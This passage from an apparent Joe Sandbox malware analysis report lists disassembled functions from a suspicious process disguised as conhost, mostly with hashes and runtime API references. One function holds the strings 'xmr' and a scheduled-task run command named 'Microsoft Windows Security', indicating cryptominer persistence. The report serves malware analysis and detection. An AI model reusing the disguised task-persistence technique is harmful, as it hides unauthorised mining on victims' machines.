APIs

strlen.MSVCRT ref: 00007FF6CE1FD185
memcpy.MSVCRT ref: 00007FF6CE1FD19E
free.MSVCRT ref: 00007FF6CE1FD1A9

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 7411ab55849008a007dc6c83d4a2f9a73750c58f95e0d40c170e633452adc814
Instruction ID: 61202e866ab970edc9b2d49145392c7902b0514f348c1ad96c74e605457a4b93
Opcode Fuzzy Hash: 7411ab55849008a007dc6c83d4a2f9a73750c58f95e0d40c170e633452adc814
Instruction Fuzzy Hash: 3C31B272A2D68345FA625E116A0037992716FB0FE2F194231FEDDA7FC8DE3CE5518280

Function 00007FF6CE206260 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00007FF6CE2062BA
MultiByteToWideChar.KERNEL32 ref: 00007FF6CE2062FA

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: fa114358f9d1c0645f095336089c12bb421f7b72dfbfd9187bbe8f1e91e12f03
Instruction ID: 29b833e120046e07c017529825a30ef01ce45cc4a5f9dbd31f140887bf7a5322
Opcode Fuzzy Hash: fa114358f9d1c0645f095336089c12bb421f7b72dfbfd9187bbe8f1e91e12f03
Instruction Fuzzy Hash: 8731B772A0C2D18AE3604F25B5107AD76B0BBA0B55F588135FAC8D7BD5CF3DD5458B80

Function 00007FF6CE1F2D70 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF6CE1F2D86
wcscpy.MSVCRT ref: 00007FF6CE1F2DFE

Strings

xmr, xrefs: 00007FF6CE1F2D72
%S /run /tn "Microsoft Windows Security", xrefs: 00007FF6CE1F2D74

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: wcscpywcslen
String ID: %S /run /tn "Microsoft Windows Security"$xmr
API String ID: 225642448-2694755926
Opcode ID: 44473131342b9c3d6659860616ea861b569dae8c1284f4b33d658fc321378122
Instruction ID: 2254ecf66b8a9adfd5bb64b48e645b8b4cb061fcfd3107b1f913d3fffd67e1bc
Opcode Fuzzy Hash: 44473131342b9c3d6659860616ea861b569dae8c1284f4b33d658fc321378122
Instruction Fuzzy Hash: 63314422A0864185EA209F11A4107BAB6B0FBA4BA5F844335FEDD93BD5EF3DE056C740

Function 00007FF6CE1F33D0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF6CE1F33F1
wcslen.MSVCRT ref: 00007FF6CE1F348D

Strings

0, xrefs: 00007FF6CE1F3442
@, xrefs: 00007FF6CE1F3453

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: wcslen
String ID: 0$@
API String ID: 4088430540-1545510068
Opcode ID: 26fbaa74645c58beb1c662cd1072959fce96db4e188e223cb72cb4d6abf3e704
Instruction ID: c312cf0bada99cf7f8f3ff63f03aeebbde7c271a87a9dc7c5372a81c427342c3
Opcode Fuzzy Hash: 26fbaa74645c58beb1c662cd1072959fce96db4e188e223cb72cb4d6abf3e704
Instruction Fuzzy Hash: 4921663261878086E3208FA5F44579AB6B4FBD4798F604225FBC887F99EF7CC0598B40

Function 00007FF6CE1F8685 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6CE1FA109

Strings

}, xrefs: 00007FF6CE1FA196
{parm#, xrefs: 00007FF6CE1FA0E3
this, xrefs: 00007FF6CE1F8691

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: d126d87f218acd473fc4b93330089d8a4941b7047482bd3d1eb6a4281afbbf06
Instruction ID: 7d0794822d8a005545297ce8ce381434bf99d4b29b5d0851e3c77cc594edfab1
Opcode Fuzzy Hash: d126d87f218acd473fc4b93330089d8a4941b7047482bd3d1eb6a4281afbbf06
Instruction Fuzzy Hash: E821A672A4C6C281E7268F2990103F927B1EB25F95F484132DE8D5AB89DF7CD4958361

Function 00007FF6CE1F3580 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF6CE1F3599
wcslen.MSVCRT ref: 00007FF6CE1F35B7

Strings

@, xrefs: 00007FF6CE1F35F8
0, xrefs: 00007FF6CE1F35E7

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: wcslen
String ID: 0$@
API String ID: 4088430540-1545510068
Opcode ID: aea334ff16771d315f46423bd26d5fdcc2d3ba9439c4921da91f434a81118734
Instruction ID: 0613f31c0e4d6c8020a8e27d2d1b3c118d1076704faf7442081dfe951ccda1f0
Opcode Fuzzy Hash: aea334ff16771d315f46423bd26d5fdcc2d3ba9439c4921da91f434a81118734
Instruction Fuzzy Hash: 8111BF2261878182E7109F61F48539AA770EFD4354F500135FBCC87B99EF7CC4468B00

Function 00007FF6CE1FD430 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6CE1FD4A9

Strings

Unknown error, xrefs: 00007FF6CE1FD520
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6CE1FD499

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: c6129450d7204aa9425f0b0a5ee21873e3dcf374583c3fc542229302485bd395
Instruction ID: 18289a0d5fc00121523faeb314a2a9c3378a4797f3b708b70aeca85657719bdb
Opcode Fuzzy Hash: c6129450d7204aa9425f0b0a5ee21873e3dcf374583c3fc542229302485bd395
Instruction Fuzzy Hash: 7D017062908E84C2D6168F1C98012EAB374FF6975AF245325FACD76660DF2DD593C700

Function 00007FF6CE1FD4E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6CE1FD4A9

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00007FF6CE1FD4E0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6CE1FD499

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 29f4ef5d8c173d3b74eb3c22cac1c5b2ad5d3302bc35ae5ea985eda276a5f484
Instruction ID: ce2c2eabadb27ffa1b03eb166411e11a3b8a74e56392677a8c8ab1a3356aa5a7
Opcode Fuzzy Hash: 29f4ef5d8c173d3b74eb3c22cac1c5b2ad5d3302bc35ae5ea985eda276a5f484
Instruction Fuzzy Hash: 58F06262908E8481D6118F18A4002FAB374FF5D79AF585326FACE769A4DF2CD6828740

Function 00007FF6CE1FD4F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6CE1FD4A9

Strings

Total loss of significance (TLOSS), xrefs: 00007FF6CE1FD4F0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6CE1FD499

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 0bcdd2314c3c51517d5ee07b94d97467dc0410b7a3df75df8a4817ab909ac92e
Instruction ID: 9fe8a80b18c45afb2652cc84da7c981cde8ba1bbf6904f69ab8c544b5d20b50c
Opcode Fuzzy Hash: 0bcdd2314c3c51517d5ee07b94d97467dc0410b7a3df75df8a4817ab909ac92e
Instruction Fuzzy Hash: 63F06262908E8481D6118F18A4002FAB374FF6E79AF585326FACD36964DF2CD6828740

Function 00007FF6CE1FD4D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6CE1FD4A9

Strings

Overflow range error (OVERFLOW), xrefs: 00007FF6CE1FD4D0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6CE1FD499

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: ffc7f7083ab47e760bb295ee22dbabe757db34ba60a4b9d6e098a080ac5640f8
Instruction ID: 8dbc91871bc36eb4379e0a764403cfbfe6bd0f95d41f948b6459bc313d61bde1
Opcode Fuzzy Hash: ffc7f7083ab47e760bb295ee22dbabe757db34ba60a4b9d6e098a080ac5640f8
Instruction Fuzzy Hash: 03F06262908E8481D6118F18A4002FAB374FF5D79AF585326FACE369A4DF2CD6828740

Function 00007FF6CE1FD500 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6CE1FD4A9

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF6CE1FD500
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6CE1FD499

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: c490c49c59b9e24825c0a6802d573e2208797f7dd482eb3f8c93c705cb10b757
Instruction ID: 2d2e7caf447ddcbcfe28ca37daaaab31eb13cbe5a458475169f6239f79f6756e
Opcode Fuzzy Hash: c490c49c59b9e24825c0a6802d573e2208797f7dd482eb3f8c93c705cb10b757
Instruction Fuzzy Hash: 3BF06862908E8481D611CF1894101FAB374FF5D75AF585325FACD36564DF1CD6438740

Function 00007FF6CE1FD510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6CE1FD4A9

Strings

Argument singularity (SIGN), xrefs: 00007FF6CE1FD510
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6CE1FD499

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 6e42f6ab832643018c5ab5e1db53d9ba1314b211f5c00237c330fd30a230164e
Instruction ID: 1b39d212f58f433a463f4ed85f98cdc925106025896c69068be934f71c2d8c7c
Opcode Fuzzy Hash: 6e42f6ab832643018c5ab5e1db53d9ba1314b211f5c00237c330fd30a230164e
Instruction Fuzzy Hash: 3AF06262908E8481D611CF18A4002FBB374FF9D79AF585326FACD76964DF2CD6828740

Function 00007FF6CE1FD461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6CE1FD4A9

Strings

Argument domain error (DOMAIN), xrefs: 00007FF6CE1FD461
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6CE1FD499

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: abe0cd034ca6e7e039f3be2709ea70163147327bdca782690fe654ac2d43d253
Instruction ID: b8520988f675574154c9e76bc2a13454cafa3c1aef31ad56b0fd3432a32089e1
Opcode Fuzzy Hash: abe0cd034ca6e7e039f3be2709ea70163147327bdca782690fe654ac2d43d253
Instruction Fuzzy Hash: 5AF06262904F8481D6018F18A4401AAB374FF5D79AF585326FEC936564DF2CD6828700

Function 00007FF6CE1FDE50 Relevance: 5.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6CE1FDE77
free.MSVCRT ref: 00007FF6CE1FDEC8
LeaveCriticalSection.KERNEL32 ref: 00007FF6CE1FDED4

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: CriticalSection$EnterLeavefree
String ID:
API String ID: 4020351045-0
Opcode ID: 2dfa7707a2d4e303a1a78d16bdb6f7eaf57818cde39d8471c90da31edd0f8fca
Instruction ID: 770b30b785463473ff9ad7291fddd2cb71376acfb142ba37867005305ddc15af
Opcode Fuzzy Hash: 2dfa7707a2d4e303a1a78d16bdb6f7eaf57818cde39d8471c90da31edd0f8fca
Instruction Fuzzy Hash: C6117962F1D60286EB148FA0A9A033833B2AFB4B02B555434E58DE7651DF6EED518380

Analysis Process: powershell.exePID: 4960, Parent PID: 2592COMMON

Executed Functions

Function 00007FFE7DD0EE9C Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2432694153.00007FFE7DD0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffe7dd0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01e8a486693b9a6bdfea007906df8c47ce01d953335895f6d36b8cd5b2139b3e
Instruction ID: aa2324d3d8701f4fd568777c447185a7527c2b160053ac01016d8ddf7d598165
Opcode Fuzzy Hash: 01e8a486693b9a6bdfea007906df8c47ce01d953335895f6d36b8cd5b2139b3e
Instruction Fuzzy Hash: 33112E3151CF088F9BA8EF1DE48595677E0FB98321B104B5FD459C7666D731E881CB82

Function 00007FFE7DE24675 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2433911667.00007FFE7DE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffe7de20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd3c5edcfc4eabbb544dbac2731316c486421f419c4adbba40ab582c5cd9bae
Instruction ID: 2d71ea80328bc267fa94899f0c3219a319f317888b5f117d63c64b3fb5345925
Opcode Fuzzy Hash: 6cd3c5edcfc4eabbb544dbac2731316c486421f419c4adbba40ab582c5cd9bae
Instruction Fuzzy Hash: 0401A77111CB0C8FD744EF0CE451AA6B3E0FB95360F10052EE58AC36A1D632E881CB41

Function 00007FFE7DEF4A21 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2435008979.00007FFE7DEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffe7def0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e542e6ca1d98c7c52452ffb8c6eeb3c7f249835954cb5654d9a99b30bca3e673
Instruction ID: 24b71b6c3061646d2fc6b8806cc30e8f6c5451b7fe6a9ad46410951cba8e94de
Opcode Fuzzy Hash: e542e6ca1d98c7c52452ffb8c6eeb3c7f249835954cb5654d9a99b30bca3e673
Instruction Fuzzy Hash: A5F05E33A5C9458FD6A6EA5CE8418A877E0EF4532071501BBD16DC7573EA25EC418784

Function 00007FFE7DEF53E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2435008979.00007FFE7DEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffe7def0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff4fb99b2e4595299bdfc39e17d9b9801b6eaf909a3b9f9ea8288daabce3ceca
Instruction ID: e6495e7f2e78e2e8995756140b1443200f02f8ecec1b80811ec64984f1c848f8
Opcode Fuzzy Hash: ff4fb99b2e4595299bdfc39e17d9b9801b6eaf909a3b9f9ea8288daabce3ceca
Instruction Fuzzy Hash: 6EF0A03131CF044FE748EE2DE8496A6B3E1FBA8311F10462FE44AC3661DA25E8818782

Function 00007FFE7DEF4CD4 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2435008979.00007FFE7DEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffe7def0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ddf7f6b9b27b3ae020b600fdcf09f41e4963cf2cf79b123397b305aec96aab0
Instruction ID: 46bf9e6f656a4d98b1158e459044fbf34508091a8e2e937c4f09feebae16197f
Opcode Fuzzy Hash: 2ddf7f6b9b27b3ae020b600fdcf09f41e4963cf2cf79b123397b305aec96aab0
Instruction Fuzzy Hash: FAF05E3291C6448FE6A6EA5CD4419A877E0EF4532070500B7D119D7563E626AC40C740

Analysis Process: winupsecvmgr.exePID: 3820, Parent PID: 1060COMMON

Executed Functions

Function 00007FF7A1EF14B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.3552409768.00007FF7A1EF1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FF7A1EF0000, based on PE: true

Associated: 0000002F.00000002.3552380059.00007FF7A1EF0000.00000002.00000001.01000000.00000015.sdmpDownload File
